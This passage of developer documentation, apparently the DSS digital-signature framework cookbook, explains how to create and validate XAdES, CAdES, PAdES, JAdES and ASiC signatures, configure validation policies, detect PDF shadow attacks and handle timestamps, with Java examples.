include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/validate/ValidateSignedXmlXadesBTest.java[tags=demo]
----

NOTE: When using the TrustedListsCertificateSource class, for performance reasons, consider creating a single instance of this class and initializing it only once.

NOTE: In general, the signature must cover the entire document so that the DSS framework can validate it. However, for example in the case of a XAdES signature, some transformations can be applied on the XML document. They can include operations such as canonicalization, encoding/decoding, XSLT, XPath, XML schema validation, or XInclude. XPath transforms permit the signer to derive an XML document that omits portions of the source document. Consequently, those excluded portions can change without affecting signature validity.

[[signedDocumentValidator]]
==== SignedDocumentValidator

For the execution of the validation process, DSS uses the 'SignedDocumentValidator' class. The DSS framework provides the following implementations of the validator:

 * `XMLDocumentValidator` - validates documents in XML format (XAdES format);
 * `CMSDocumentValidator` - validates documents in CMS format (CAdES format);
 * `PDFDocumentValidator` - validates documents in PDF format (PAdES format);
 * `JWSCompactDocumentValidator` - validates documents with base64url encoded content (JAdES compact format);
 * `JWSSerializationDocumentValidator` - validates documents in JSON format (JAdES serialization formats);
 * `ASiCContainerWithXAdESValidator` - validates ASiC with XAdES containers;
 * `ASiCContainerWithCAdESValidator` - validates ASiC with CAdES containers;
 * `DetachedTimestampValidator` - validates CMS timestamps provided alone.

DSS initializes a relevant validator based on specific characteristics of the input file (e.g. a PDF version declaration for a PDF file). It checks the file format and loads the required validator from the classpath. Below you can find a list of settings that can be used for the configuration of the class.

[source,java,indent=0]
.SignedDocumentValidator usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/SignedDocumentValidatorTest.java[tags=demo]
----

=== Validation Result Materials

The result of the validation process consists of four elements:

 * the Simple Report,
 * the Detailed Report,
 * the Diagnostic Data and
 * the ETSI Validation Report.

All these reports are encoded using XML, which allows the implementer to easily manipulate and extract information for further analysis. For each report, an XML Schema and a JAXB model are available as Maven dependencies.

DSS also provides XSLTs to generate PDF or HTML versions of the simple and detailed reports.

You will find below a detailed description of each of these elements.

==== Simple Report

This is a sample of the simple validation report:

.Simple Report
include::_samples/simple-report-example.adoc[]

The result of the validation process is based on very complex rules. The purpose of this report is to present the information as simply as possible while keeping the most important elements.
==== Detailed Report

This is a sample of the detailed validation report. Its structure is based on the ETSI standard <<R09>> and is built around Basic Building Blocks, Basic Validation Data, Timestamp Validation Data, AdES-T Validation Data and Long Term Validation Data. Some segments were deleted to make reading easier. They are marked by three dots:

.Detailed Report
include::_samples/detailed-report-example.adoc[]

For example, the Basic Building Blocks are divided into seven elements:

 * FC - Format Checking
 * ISC - Identification of the Signing Certificate
 * VCI - Validation Context Initialization
 * RFC - Revocation Freshness Checker
 * XCV - X.509 certificate validation
 * CV - Cryptographic Verification
 * SAV - Signature Acceptance Validation

The following additional elements can also be executed in case of validation in the past:

 * PCV - Past Certificate Validation
 * VTS - Validation Time Sliding process
 * POE extraction - Proof Of Existence extraction
 * PSV - Past Signature Validation

Past certificate/signature validation is used when the basic validation of a certificate/signature fails at the current time with an INDETERMINATE status, such that the provided proofs of existence may help to reach a determined status. The process shall initialize the _best-signature-time_ either to a time indication of a related provided POE, or to the current time when this parameter has not been used by the algorithm.

 * *Best-signature-time* is an internal variable for the algorithm denoting the earliest time when it can be trusted by the SVA (either because proven by some POE present in the signature or passed by the DA and for this reason assumed to be trusted) that a signature has existed. <<R09>>

Each block contains a number of rules that are executed sequentially. The rules are driven by the constraints defined in the validation policy. The result of each rule is OK or NOT OK. The process is stopped when the first rule fails. Each block also contains a conclusion. If all rules are met then the conclusion node indicates PASSED. Otherwise a FAILED or INDETERMINATE indication is returned, depending on the ETSI standard definition.

==== Diagnostic Data

This is a data set constructed from the information contained in the signature itself, but also from information retrieved dynamically (such as revocation data) and from derived information (such as the mathematical validity of a signature). All this information is independent of the applied validation policy. Two different validation policies applied to the same diagnostic data can lead to different results.

This is an example of the diagnostic data for a XAdES signature. Certain fields and certain values were trimmed or deleted to make reading easier:

.Diagnostic Data
include::_samples/diagnostic-data-example.adoc[]
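
The diagnostic data can also be explored programmatically through its JAXB-backed wrapper. The following minimal sketch assumes that a `Reports` object has already been produced, as in the validation example above:

[source,java]
.Exploring the Diagnostic Data (sketch)
----
import eu.europa.esig.dss.diagnostic.CertificateWrapper;
import eu.europa.esig.dss.diagnostic.DiagnosticData;
import eu.europa.esig.dss.diagnostic.SignatureWrapper;
import eu.europa.esig.dss.validation.reports.Reports;

public class ExploreDiagnosticDataSketch {

    // 'reports' is assumed to come from SignedDocumentValidator#validateDocument()
    public static void explore(Reports reports) {
        DiagnosticData diagnosticData = reports.getDiagnosticData();

        // One wrapper per signature found in the document
        for (SignatureWrapper signature : diagnosticData.getSignatures()) {
            System.out.println(signature.getId() + " : " + signature.getSignatureFormat());
        }

        // All certificates collected during the validation, whatever their origin
        for (CertificateWrapper certificate : diagnosticData.getUsedCertificates()) {
            System.out.println(certificate.getCommonName());
        }
    }
}
----
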
==== ETSI Validation Report

The ETSI Validation Report represents an implementation of TS 119 102-2 (cf. <<R13>>). The report contains a standardized result of a digital signature validation. It includes the original validation input data, the applied validation policy, as well as the validation result of one or more signature(s) and their constraints.

This is an example of the ETSI validation report:

.ETSI Validation Report (TS 119 102-2)
include::_samples/etsi-validation-report-example.adoc[]

[[validationPolicy]]
=== Validation Policy

The validation process may be driven by a set of constraints that are contained in the XML policy file.

In order to run a validation process with a custom validation policy, an XML file shall be created in compliance with the https://github.com/esig/dss/blob/master/dss-policy-jaxb/src/main/resources/xsd/policy.xsd[policy.xsd] schema and passed to the relevant `DocumentValidator` as shown below.

[source,java,indent=0]
.Custom validation policy
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/Snippets.java[tags=validationPolicy]
----

==== XML policy structure

The validation policy allows defining different behaviors for the various token types or signature formats under validation. The following groups are considered:

 * `ContainerConstraints` - defines rules for the validation of ASiC containers;
 * `SignatureConstraints` - defines rules for the processing of the signature basic building blocks and the related certificate chain;
 * `CounterSignatureConstraints` - allows defining custom rules for counter signature processing;
 * `Timestamp` - defines rules for timestamp validation;
 * `Revocation` - defines rules for revocation data validation;
 * `Cryptographic` - defines common rules for the cryptographic validation of the used algorithms. The general constraints are used when no cryptographic constraints are defined for a particular token type;
 * `Model` - defines the way a certificate chain is processed;
 * `eIDAS` - defines rules for the validation of Trusted Lists.

==== Constraints

Each constraint defined in the policy forces the execution of a relevant check in the validation process.

NOTE: If a constraint is missing from the policy, the check is not processed.

The following constraint types are supported:

 * `LevelConstraint` - a simple constraint type with a defined processing `Level`;
 * `MultiValuesConstraint` - allows defining a set of accepted values for the related check.

==== Level

The `Level` attribute of a constraint defines the validation process behavior in case of a check failure:

 * `FAIL` - breaks the validation process and returns the relevant indication;
 * `WARN` - continues the validation process and returns a warning message to the validation process output;
 * `INFORM` - continues the validation process and returns an information message to the validation process output;
 * `IGNORE` - processes the check in a silent mode (equivalent to a constraint that is not defined).
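
The `Level` values above, as well as the `MultiValuesConstraint` described in the next section, map to the JAXB model of the dss-policy-jaxb module, so constraints can also be assembled programmatically. The following is a hedged sketch assuming the JAXB classes generated from policy.xsd (`LevelConstraint`, `MultiValuesConstraint`, `Level`); class and method names may differ between DSS versions, and the accepted values are illustrative:

[source,java]
.Building policy constraints programmatically (sketch)
----
import eu.europa.esig.dss.policy.jaxb.Level;
import eu.europa.esig.dss.policy.jaxb.LevelConstraint;
import eu.europa.esig.dss.policy.jaxb.MultiValuesConstraint;

public class PolicyConstraintSketch {

    public static void main(String[] args) {
        // A simple check that breaks the validation process on failure
        LevelConstraint signatureIntact = new LevelConstraint();
        signatureIntact.setLevel(Level.FAIL);

        // A value-based check that only warns when an unexpected value is found
        MultiValuesConstraint acceptableFormats = new MultiValuesConstraint();
        acceptableFormats.setLevel(Level.WARN);
        acceptableFormats.getId().add("XAdES-BASELINE-B");
        acceptableFormats.getId().add("XAdES-BASELINE-T");
    }
}
----
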
==== Multi Values Constraint

When using the `MultiValuesConstraint`, a list of acceptable values shall be defined in the list of `<Id>...</Id>` elements, one for each accepted value. The following rules apply:

 * an empty list of values -> only an empty value is accepted for the item in question, otherwise the check fails;
 * the `"*"` constraint value -> all values are accepted, but an empty list of values is rejected;
 * custom values -> only the item values matching the constraint are accepted.

==== Cryptographic constraints

Cryptographic constraints define a list of acceptable cryptographic algorithms and, when needed, their expiration dates. The following settings are possible:

 * `AcceptableEncryptionAlgo` - defines a list of acceptable encryption algorithms. All tokens and signatures using other algorithms will be rejected.
 * `MiniPublicKeySize` - defines the minimal allowed public key size to be used with the defined encryption algorithms. An algorithm with a key size smaller than the defined one will be rejected. The minimal key size is required to be defined for an encryption algorithm, otherwise all used key sizes will be rejected.
 * `AcceptableDigestAlgo` - defines a list of acceptable digest algorithms. All tokens and signatures using other algorithms will be rejected.
 * `AlgoExpirationDate` - defines expiration dates for the algorithms. An algorithm is rejected when it is used after the defined date. If the algorithm expiration date is not defined, or is set to null, the algorithm is treated as reliable for an unlimited time.

==== The default XML policy

The default XML validation policy is presented below.

.constraint.xml (default policy is provided in dss-policy-jaxb module)
include::_samples/constraint.adoc[]

== CAdES signature (CMS)

To familiarize yourself with this type of signature it is advisable to read the following document:

* CAdES Specifications (cf. <<R02>>)

To implement this form of signature you can use the XAdES examples. You only need to instantiate the CAdES service object and change the SignatureLevel parameter value. Below is an example of a CAdES-BASELINE-B signature:

[source,java,indent=0]
.Signing a file with CAdES
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlCadesBTest.java[tags=demo]
----

== PAdES signature (PDF)

The standard ISO 32000-1 (cf. <<R06>>) defines a file format for portable electronic documents. It is based on PDF 1.7 of Adobe Systems. Concerning digital signatures it supports three operations:

 * adding a digital signature to a document,
 * providing a placeholder field for signatures,
 * checking signatures for validity.

PAdES defines eight different profiles to be used with advanced electronic signatures in the meaning of the European Union Directive 1999/93/EC (cf. <<R07>>):

 * PAdES Basic - PDF signature as specified in ISO 32000-1 (cf. <<R06>>). The profile is specified in ETSI EN 319 142 (cf. <<R03>>).
 * PAdES-BES profile - based upon CAdES-BES as specified in ETSI EN 319 122 (cf. <<R02>>) with the option of a signature time-stamp (CAdES-T).
 * PAdES-EPES profile - based upon CAdES-EPES as specified in ETSI EN 319 122 (cf. <<R02>>).
This profile is the same as PAdES-BES with the addition of a signature policy identifier and optionally a commitment type indication.
 * PAdES-LTV profile - supports the long term validation of PDF signatures and can be used in conjunction with the above-mentioned profiles.
 * Four other PAdES profiles for XML content.

To familiarize yourself with this type of signature it is advisable to read the documents referenced above.

Below is an example of code to perform a PAdES-BASELINE-B type signature:

[source,java,indent=0]
.Signing a PDF file with PAdES
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignPdfPadesBTest.java[tags=demo]
----

In order to add a timestamp to the signature (PAdES-T or LTA), a TSP source must be provided to the service.

To create a PAdES-BASELINE-B level signature with additional options, namely a signature policy identifier and optionally a commitment type indication, please observe the following example. All these parameters are optional.

[source,java,indent=0]
.Defining a Signature Policy
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignPdfPadesBTest.java[tags=policy]
----

The extension of a signature from the PAdES-BASELINE-B level up to the PAdES-BASELINE-LTA profile will add the following features:

 * Addition of validation data to an existing PDF document, which may be used to validate earlier signatures within the document (including PDF signatures and time-stamp signatures).
 * Addition of a document time-stamp which protects the existing document and any validation data.
 * Further validation data and document time-stamps may be added to a document over time to maintain its authenticity and integrity.

=== PAdES Visible Signature

The framework also allows the creation of PDF files with a visible signature as specified in ETSI EN 319 142 (cf. <<R03>>). In the `SignatureParameters` object, there is a special attribute named `SignatureImageParameters`. This parameter allows you to customize the visual signature (with text, with image, or with image and text).
Below is an example of code to perform a PAdES-BASELINE-B type signature with a visible signature:

[source,java,indent=0]
.Add a visible signature to a PDF document
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignPdfPadesBVisibleTest.java[tags=parameters-configuration;sign]
----

Additionally, DSS also allows you to insert a visible signature into an existing field:

[source,java,indent=0]
.Add a visible signature to an existing field
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/Snippets.java[tags=select-pdf-signature-field]
----

In case of placing an image or text into an existing field, the visible signature will fill the whole available area of the field.

==== Visible signature parameters (image and text)

This chapter introduces the existing parameters for the creation of visible signatures with DSS.
DSS has three implementations for visible signature drawing:

 * *OpenPDF (iText)* - supports separate image and text drawing;
 * *PDFBox Default* - supports separate image and text drawing, as well as a joint drawing of image and text together. Transforms text to an image;
 * *PDFBox Native* - supports separate image and text drawing, as well as a joint drawing of image and text together.
Prints text in a native way, which increases the quality of the produced signature.

===== Positioning

DSS provides a set of functions allowing to place the signature field on a specific place in the PDF page:

[source,java,indent=0]
.Visible signature positioning
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/PAdESVisibleSignatureSnippet.java[tags=positioning]
----

===== Dimensions

The DSS framework provides a set of functions to manage the signature field size:

[source,java,indent=0]
.Visible signature dimensions
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/PAdESVisibleSignatureSnippet.java[tags=dimensions]
----

===== Text Parameters

The available implementations allow placing visible text in a signature field:

[source,java,indent=0]
.List of available visible text parameters
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignPdfPadesBVisibleTest.java[tags=text]
----

===== Text and image combination

DSS provides a set of functions to align text relative to an image. The parameters must be applied to a `SignatureImageTextParameters` object:

[source,java,indent=0]
.Combination of text and image parameters
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignPdfPadesBVisibleTest.java[tags=textImageCombination]
----

The result of applying the foregoing transformations is shown in the image below:

image::visual-sig-text-parameters.jpg[]

==== Fonts usage

Since version 5.5, DSS supports two types of fonts. A custom font must be added as an instance of the `DSSFont` interface to a `SignatureImageTextParameters` object.
The `DSSFont` interface has the following common implementations:

 * `DSSFileFont` for the use of physical fonts, which must be embedded into the produced PDF document. To create an instance of the class, you must pass to a `DSSFileFont` constructor an object of `DSSDocument` type or an InputStream of the font file;
 * `DSSJavaFont` for the use of logical fonts (default Java fonts). Logical Java fonts allow you to significantly reduce the document size, because these fonts are not embedded into the final PDF document. Be aware that the use of logical fonts does not allow producing PDF documents satisfying the PDF/A standard. To create an instance of this class, you should pass as an input a `java.awt.Font` object or the target font parameters (name, style, size).

WARNING: Logical fonts may have different implementations depending on the used PAdES Visible signature service or Operating System (OS).
Keep this in mind when switching the implementation or system environment.

There are also classes allowing the definition of native fonts for the corresponding implementations (available since DSS 5.7):

 * `ITextNativeFont` to be used with `ITextSignatureDrawerFactory`;
 * `PdfBoxNativeFont` to be used with `PdfBoxNativeObjectFactory`.

You can create a custom font as follows (for a physical font):

[source,java,indent=0]
.Add a custom font as a file
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignPdfPadesBVisibleTest.java[tags=font]
----

For a logical font:

[source,java,indent=0]
.Java font usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignPdfPadesBVisibleExistingTest.java[tags=font]
----

For a native font:

[source,java,indent=0]
.Native font usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/PAdESVisibleSignatureSnippet.java[tags=nativeFont]
----

By default, DSS uses a Google font: 'PT Serif Regular' (its physical implementation).

NOTE: The 'Native PDFBox Drawer' implementation supports only one of the following fonts: SERIF, SANS-SERIF, MONOSPACED, DIALOG and DIALOG_INPUT.

=== Shadow attack detection

"Shadow attack" is a class of attacks on a signed PDF document that consists in changing the visual content of the document after the signature has been made. Due to the structure of a PDF document, the signature stays cryptographically valid even after the modification of the content has taken place. There are no algorithms to detect the malicious change with a 100% guarantee. For more information, please refer to https://pdf-insecurity.org/[the website].

Since v5.8, DSS provides its own set of utilities to detect a "shadow attack" on a signed PDF document. The following algorithms have been introduced:

 * `Page amount difference` - the validation tool compares the number of pages between the obtained PDF and the signed revision. If the numbers do not match, the validation fails. The validation level can be configured within the <<validationPolicy>> with the constraint `<PdfPageDifference>`.
 * `Annotations overlap` - DSS checks if any annotation overlaps occurred. The overlapping is potentially dangerous, because some annotations can cover visual content, e.g. forms and signature fields. The validation level can be configured with the constraint `<PdfAnnotationOverlap>`.
 * `Visual difference` - DSS verifies the visual difference between the provided document and the signed revision, excluding the newly created annotations (between the validated revisions). The validation level can be configured with the constraint `<PdfVisualDifference>`.

== JAdES signature (JWS)

Since v5.8, DSS supports the creation and validation of JSON Advanced Electronic Signatures.

The JSON format for AdES Signatures (cf. <<R05>>) represents an extension of JSON Web Signatures (JWS) as specified in https://tools.ietf.org/html/rfc7515[IETF RFC 7515].

WARNING: The implementation is based on a draft of the standard ETSI TS 119 182-1.
Some modifications can occur in future releases.

A typical example of a JAdES signature creation is represented below:

[source,java,indent=0]
.Signing a file with JAdES
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlJadesBTest.java[tags=demo]
----

The specific parameters for JAdES signatures are described in the next sections.

=== JWS Serialization type

A JWS signature can be represented in different forms, which are supported by JAdES as well:

 * `COMPACT_SERIALIZATION` represents a compact, URL-safe serialization. It has no JWS Unprotected Header, therefore only the JAdES-BASELINE-B level is possible with this format.
 * `JSON_SERIALIZATION` represents a JSON object with a collection of signatures inside the `signatures` header, which allows parallel signing. It allows the JAdES-BASELINE-T/-LT/-LTA signature extension levels.
 * `FLATTENED_JSON_SERIALIZATION` represents a JSON object with a single signature container. It allows the JAdES-BASELINE-T/-LT/-LTA signature extension levels.

[source,java,indent=0]
.JWS Serialization type usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlJadesBTest.java[tags=serialization]
----

=== JAdES Signature Packaging

JAdES signatures allow two types of JWS Payload (signed data) inclusion: `ENVELOPING` and `DETACHED`.

==== Enveloping packaging

With `ENVELOPING` packaging the JWS Payload is enveloped into the JAdES Signature. This type only allows signing one document.

==== Detached packaging

A simple JWS signature allows a `DETACHED` packaging by omitting the JWS Payload in the created signature. For the validation process the detached content shall be provided; it is then treated in the same way as attached content.

To create such a signature, the parameter `SigDMechanism.NO_SIG_D` shall be set. This mechanism allows signing only one document.

The JAdES standard <<R05>> provides a possibility to sign multiple documents within one signature in a detached way.

The following mechanisms are possible:

 * `HTTP_HEADERS` is used to sign an HTTP request. The signature may explicitly sign several HTTP headers (represented by the class `HTTPHeader`), as well as the HTTP message body (see the `HTTPHeaderDigest` class).

[source,java,indent=0]
.Configuration for signing with detached mechanism HttpHeaders
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignHttpHeadersJadesBTest.java[tags=demo]
----

 * `OBJECT_ID_BY_URI` can be used to sign multiple documents. The signed files are dereferenced by URIs and their content is concatenated for the generation of the JWS Payload.

 * `OBJECT_ID_BY_URI_HASH` similarly provides a possibility to sign multiple documents, by signing the computed digests of the original documents.
The JWS Payload for this format stays empty.

[source,java,indent=0]
.Configuration for signing with detached mechanism ObjectIdByURIHash
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignMultipleDocumentsJadesTTest.java[tags=demo]
----

=== Base64Url encoding

`Base64Url` represents a Base64 encoded format with a URI-safe alphabet (see https://tools.ietf.org/html/rfc4648[RFC 4648]).

JAdES signatures (as well as JWS) force some values to be Base64Url-encoded, while providing a possibility to customize the representation of some of them.

DSS provides options to configure the encoding for the following elements:

 * The JWS Payload can be represented as Base64Url encoded octets (by default), or can be present in its initial form (with the protected header `b64` set to `false`).

[source,java,indent=0]
.Use unencoded JWS Payload
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignHttpHeadersJadesBTest.java[tags=unencodedPayload]
----

 * The components of the unsigned header `etsiU` can occur either as Base64Url encoded strings (by default), or as clear JSON objects.

NOTE: All components inside the `etsiU` header shall be present in the same form (Base64Url encoded or as clear JSON).

WARNING: The current version of DSS does not allow JAdES-BASELINE-LTA level creation for `etsiU` components in their clear JSON representation.

[source,java,indent=0]
.Represent EtsiU components as clear JSON instances
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignMultipleDocumentsJadesTTest.java[tags=clearEtsiU]
----

== ASiC signature (containers)

When creating a digital signature, the user must choose between different packaging elements, namely enveloping, enveloped or detached. This choice is not obvious, because in one case the signature will alter the signed document and in the other case it is possible to lose the association between the signed document and its signature. That is where the standard ETSI EN 319 162 (cf. <<R04>>) offers a standardized use of container forms to establish a common way of associating data objects with advanced signatures or time-stamp tokens.

A number of application environments use ZIP based container formats to package sets of files together with meta-information. The ASiC technical specification is designed to operate with a range of such ZIP based application environments. Rather than enforcing a single packaging structure, ASiC describes how these package formats can be used to associate advanced electronic signatures with any data objects.

The standard defines two types of containers. The first (ASiC-S) allows you to associate one or more signatures with a single data element. In this case the structure of the signature can be based (in a general way) on a single CAdES signature, on multiple XAdES signatures, or finally on a single time-stamp token (TST). The second is an extended container (ASiC-E) that includes multiple data objects. Each data object may be signed by one or more signatures, whose structure is similar to ASiC-S. This second type of container is compatible with the OCF, UCF and ODF formats.

For the moment the DSS framework has some restrictions on the containers you can generate, depending on the input file. If the input file is already an ASiC container, the output container must be the same type of container based on the same type of signature.
If the input is any other file, the output does not have any restriction.

.ASiC containers
|===
|Input |Output

|ASiC-S CAdES |ASiC-S CAdES

|ASiC-S XAdES |ASiC-S XAdES

|ASiC-E CAdES |ASiC-E CAdES

|ASiC-E XAdES |ASiC-E XAdES

|Binary |ASiC-S CAdES, ASiC-S XAdES, ASiC-E CAdES, ASiC-E XAdES
|===

This is an example of the source code for signing a document using ASiC-S based on XAdES-B:

[source,java,indent=0]
.Sign a file within an ASiC-S container
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignOneFileWithASiCSBTest.java[tags=demo]
----

This is another example of the source code for signing multiple documents using ASiC-E based on CAdES:

[source,java,indent=0]
.Sign multiple files within an ASiC-E container
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignMultipleDocumentsWithASiCSEWithCAdESTest.java[tags=demo]
----

Please note that you need to pass only a few parameters to the service. Other parameters, although set, will be overwritten by the internal implementation of the service. Therefore, the obtained signature is always based on CAdES and uses DETACHED packaging.

It is also possible with the DSS framework to extend an ASiC container to the XAdES-BASELINE-T or -LT level.

== Counter signatures

Since v5.8 DSS allows producing counter signatures according to the corresponding AdES formats.

NOTE: A counter signature does not provide a Proof Of Existence for the signed signature! Use signature extension / timestamping for this purpose.

The following formats are supported for counter signature creation:

 * `XAdES` - multiple, nested and extended counter signatures (up to LTA level) are allowed;
 * `CAdES` - B-level counter signatures are allowed, as well as multiple counter signatures;
 * `JAdES` - multiple, nested and extended signatures (up to LTA level) are allowed;
 * `ASiC` - counter signatures are allowed according to the used format (XAdES or CAdES).

In order to create a counter signature, the DSS Identifier (or XML Id for XAdES) of the target signature you want to sign shall be provided within the parameters. The example below represents a counter signature creation:

[source,java,indent=0]
.Counter signature creation
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/CounterSignXadesBTest.java[tags=demo]
----

== Various parameters

[[signaturePolicy]]
=== Signature policy

With the new standards the policy handling is linked to the -B level. The old -EPES level is not used anymore by the framework. This does not alter the structure of the old signature but only modifies how the process of its creation is controlled.

The DSS framework allows you to reference a signature policy, which is a set of rules for the creation and validation of an electronic signature. It includes two kinds of text:

* In a human readable form:
It can be assessed to meet the requirements of the legal and contractual context in which it is being applied.

* In a machine processable form:
To facilitate its automatic processing using the electronic rules.

If no signature policy is identified then the signature may be assumed to have been generated or verified without any policy constraints, and hence may be given no specific legal or contractual significance through the context of a signature policy.

The signer may reference the policy either implicitly or explicitly.
An implied policy means the signer follows the rules of the policy but the signature does not indicate which policy is used. It is assumed that the choice of policy is clear from the context in which the signature is used, and the SignaturePolicyIdentifier element will be empty. When the policy is not implied, the signature contains an ObjectIdentifier that uniquely identifies the version of the policy in use. The signature also contains a hash of the policy document to make sure that the signer and the verifier agree on the contents of the policy document.

This example demonstrates an implicit policy identifier. To implement this alternative you must set SignaturePolicyId to an empty string.

[source,java,indent=0]
.XAdES with implicit policy
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBImplicitPolicyTest.java[tags=demo]
----

An XML segment will be added to the signature's qualified and signed properties:

include::_samples/xades-implicit-policy.adoc[]

The next example demonstrates an explicit policy identifier. This is obtained by setting the -B profile signature policy and assigning values to the policy parameters. The Signature Policy Identifier is a URI or OID that uniquely identifies the version of the policy document. The signature will contain the identifier of the hash algorithm and the hash value of the policy document. The DSS framework does not automatically calculate the hash value; it is up to the developer to proceed with the calculation, using for example the java.security.MessageDigest class. It is important to keep the policy file intact in order to keep the hash constant. It would be wise to make the policy file read-only.

[source,java,indent=0]
.XAdES with explicit policy
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBExplicitPolicyTest.java[tags=demo]
----

The following XML segment will be added to the signature qualified & signed properties (<QualifyingProperties><SignedProperties>):

.XAdES Signature Policy element
include::_samples/xades-explicit-policy.adoc[]
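
The policy digest mentioned above can be computed with plain JDK tools. Below is a minimal sketch; the policy file name is a placeholder, and the chosen algorithm must match the digest algorithm declared in the signature parameters:

[source,java]
.Computing the signature policy digest (sketch)
----
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Base64;

public class PolicyDigestSketch {

    public static void main(String[] args) throws IOException, NoSuchAlgorithmException {
        // Placeholder: path to the (preferably read-only) signature policy document
        byte[] policyContent = Files.readAllBytes(Paths.get("signature-policy.pdf"));

        // Must match the digest algorithm referenced in the signature policy parameters
        MessageDigest messageDigest = MessageDigest.getInstance("SHA-256");
        byte[] policyDigest = messageDigest.digest(policyContent);

        System.out.println(Base64.getEncoder().encodeToString(policyDigest));
    }
}
----
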
=== Signature Policy Store

Since v5.8 DSS provides the possibility to incorporate a Signature Policy Store element as an unsigned property into an existing signature file.

The following signature formats support the Signature Policy Store addition:

* XAdES (as well as ASiC with XAdES);
* CAdES (as well as ASiC with CAdES);
* JAdES.

NOTE: Being an unsigned component, the Signature Policy Store is not protected by the digital signature, unlike a Signature Policy Identifier incorporated into the signed properties.

Before incorporating a Signature Policy Store, you need to ensure that the target signature contains the matching Signature Policy Identifier element (see ch. <<signaturePolicy>>).

An example of a Signature Policy Store creation is available below:

[source,java,indent=0]
.Add SignaturePolicyStore
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignXmlXadesBExplicitPolicyTest.java[tags=addSPS]
----

=== Trust anchor inclusion policy

It is possible to indicate to the framework whether the certificate related to the trust anchor should be included in the signature or not. The setter `BLevelParameters#setTrustAnchorBPPolicy` should be used for this purpose.

This rule applies as follows: when the -B level is constructed the trust anchor is not included, while when the -LT level is constructed the trust anchor is included.

NOTE: When the trust anchor baseline profile policy is defined, only the certificates prior to the trust anchor are included when the -B level is constructed.

== Timestamps

=== Timestamp creation

Since DSS 5.6 the framework allows independent document timestamping (without a signature). The following Document Signature Services support timestamping:

 * `PAdESService` - adds a timestamp to a PDF document;
 * `ASiCWithCAdESService` - creates a timestamped ASiC container with the provided documents.

[source,java,indent=0]
.PDF timestamping
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/timestamp/TimestampPDFTest.java[tags=creation]
----

=== Timestamp validation

As well as timestamp creation, DSS provides a validation service for timestamped documents. The timestamp validation process implements the "5.4 Time-stamp validation building block" (cf. <<R09>>). The validation process is identical to the <<signatureValidation>> process. An appropriate validator will be selected automatically. In total, DSS supports timestamp-alone validation for the following file formats:

 * Detached CMS timestamp (`DetachedTimestampValidator`) - the detached signed content must be provided (or its digest);
 * PDF document (`PDFDocumentValidator`);
 * ASiC CAdES container with a timestamp (`ASiCWithCAdESTimestampValidator`).

The validation process can be run with the following inputs:

[source,java,indent=0]
.Timestamped document validation
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/timestamp/TimestampPDFTest.java[tags=validation]
----

The produced reports use the same structure as for the <<signatureValidation>>.

==== Timestamp qualification

DSS is also able to determine the qualification level of a timestamp, if relevant information about TrustServiceProviders is provided to the certificate verifier (loaded automatically into a trusted certificate source with the <<tlValidationJob>>) (cf. <<R14>>).

Three qualification levels are supported by DSS and can be obtained:

 * `QTSA` (issued from a granted trust service with TSA/QTST type at the timestamp production time);
 * `TSA` for any other timestamp issued from a known trust anchor;
 * `N/A` for others.

An example of a produced Detailed Report can be seen below:

.Timestamp Detailed Report
include::_samples/timestamp-detailed-report-example.adoc[]

== Available implementations of DSSDocument

DSS allows the creation of different kinds of `DSSDocument`:

 * `InMemoryDocument`: fully loaded in memory. This type of DSSDocument can be instantiated with an array of bytes, an InputStream,... (a short sketch follows the example below);
 * `FileDocument`: refers to an existing File;
 * `DigestDocument`: only contains pre-computed digest values for a given document. That allows a user to avoid sending the full document (detached signatures).

[source,java,indent=0]
.DigestDocument
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sources/DigestDocumentTest.java[tags=demo]
----
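
For completeness, the two other implementations can be instantiated as shown in the following minimal sketch; the file path and content are placeholders:

[source,java]
.InMemoryDocument and FileDocument (sketch)
----
import eu.europa.esig.dss.enumerations.DigestAlgorithm;
import eu.europa.esig.dss.model.DSSDocument;
import eu.europa.esig.dss.model.FileDocument;
import eu.europa.esig.dss.model.InMemoryDocument;

public class DocumentKindsSketch {

    public static void main(String[] args) {
        // InMemoryDocument: the content is held entirely in memory
        DSSDocument inMemory = new InMemoryDocument("Hello World!".getBytes());

        // FileDocument: refers to an existing file on the file system (placeholder path)
        DSSDocument fromFile = new FileDocument("xml_example.xml");

        // Digests can be computed on demand for any DSSDocument
        System.out.println(inMemory.getDigest(DigestAlgorithm.SHA256));
        System.out.println(fromFile.getName());
    }
}
----
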
